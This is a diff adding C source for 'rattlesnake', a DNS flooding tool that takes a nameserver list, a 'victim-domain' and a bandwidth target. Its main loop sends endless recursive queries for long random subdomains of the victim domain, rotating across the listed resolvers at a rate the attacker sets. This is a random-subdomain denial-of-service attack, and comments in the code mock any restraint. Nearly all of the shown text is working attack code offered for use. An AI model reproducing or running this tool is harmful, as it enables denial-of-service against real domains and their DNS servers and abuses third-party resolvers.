+int             sd_len = 340;
+
+
+int
+usage (char *program)
+{
+        printf ("usage: %s <ns-list> <victim-domain> <bandwidth> [sdlen]\n\n"
+                "ns-list        file with a nameserver list\n"
+                "victim-domain  the domain that references to our victim ip\n"
+                "bandwidth      bandwidth in kbps that we should utilize, the higher the lamer\n"
+                "sdlen          subdomain length as in <sdlen>.<victim-domain>\n"
+                "               default is 340 (1-400 makes sense)\n\n",
+                program);
+
+        exit (EXIT_FAILURE);
+}
+
+
+int
+main (int argc, char **argv)
+{
+        printf ("rattlesnake "VERSION" by "AUTHORS"\n\n");
+
+        if (argc < 4 || argc > 5)
+                usage (argv[0]);
+        if (argc == 5 && sscanf (argv[4], "%d", &sd_len) != 1)
+                usage (argv[0]);
+
+
+        ip_local = net_getlocalip ();
+
+        ns_list = file_read (argv[1]);
+        if (ns_list == NULL) {
+                fprintf (stderr, "failed to open nameserver list file %s\n", argv[1]);
+                exit (EXIT_FAILURE);
+        }
+        for (ns_count = 0 ; ns_list[ns_count] != NULL ; ++ns_count)
+                ;
+        if (ns_count == 0) {
+                fprintf (stderr, "come on boy, you must at least supply one nameserver\n");
+                exit (EXIT_FAILURE);
+        }
+
+        if (sscanf (argv[3], "%d", &speed) != 1)
+                usage (argv[0]);
+
+        printf ("[ns] querying below %s through the help of %d nameservers at %d kbps\n",
+                argv[2], ns_count, speed);
+        printf ("===============================================================================\n");
+
+        srandom (time (NULL));
+
+        rattle (argv[2]);
+
+        exit (EXIT_SUCCESS);
+}
+
+
+int
+rattle (char *domain_victim)
+{
+        dns_pdata *             dp;
+        char *                  querydomain;
+        char *                  querydomain2;
+        struct timeval          tv_start;
+        unsigned long long int  size_send = 0;
+
+        gettimeofday (&tv_start, NULL);
+
+        while (1) {
+                unsigned long long int  sleeptime;
+                struct timeval          tv_now;
+
+                /* construct query domain, slow
+                 */
+                dp = dns_build_new ();
+                querydomain = dns_build_random (domain_victim, 32);
+                while (strlen (querydomain) < sd_len) {
+                        querydomain2 = dns_build_random (querydomain, 32);
+                        free (querydomain);
+                        querydomain = querydomain2;
+                }
+
+                /* now build DNS packet
+                 */
+                dns_build_q (dp, querydomain, T_A, C_IN);
+                dns_packet_send (ip_local, ns_list[ns_walker], m_random (1024, 65535), 53,
+                        m_random (1, 65535), DF_RD, 1, 0, 0, 0, dp);
+                dns_build_destroy (dp);
+
+                size_send += strlen (querydomain) + sizeof (ip_hdr) +
+                        sizeof (udp_hdr) + sizeof (dns_hdr);
+                free (querydomain);
+
+                /* eye candy
+                 */
+                printf (".");
+                fflush (stdout);
+
+                /* next server
+                 */
+                ns_walker++;
+                ns_walker %= ns_count;
+
+                /* if you get fucked up here it's because you've packeted too
+                 * much, so bugger off and don't be a wussy
+                 */
+                do {
+                        /* some people might think now that a sleeptime approach
+                         * is better here, but in this case a mixture of polling
+                         * and time calculation is better for equal spreading of
+                         * the packets being send
+                         */
+                        usleep (5000);          /* don't poll too fast */
+                        gettimeofday (&tv_now, NULL);
+                        sleeptime = tv_now.tv_sec - tv_start.tv_sec;
+                        sleeptime *= 1000000;
+                        sleeptime += ((tv_now.tv_usec + 1000000) - tv_start.tv_usec) % 1000000;
+                } while (((sleeptime * speed) / 7812) < size_send);
+        }
+
+        return (1);
+}
+
+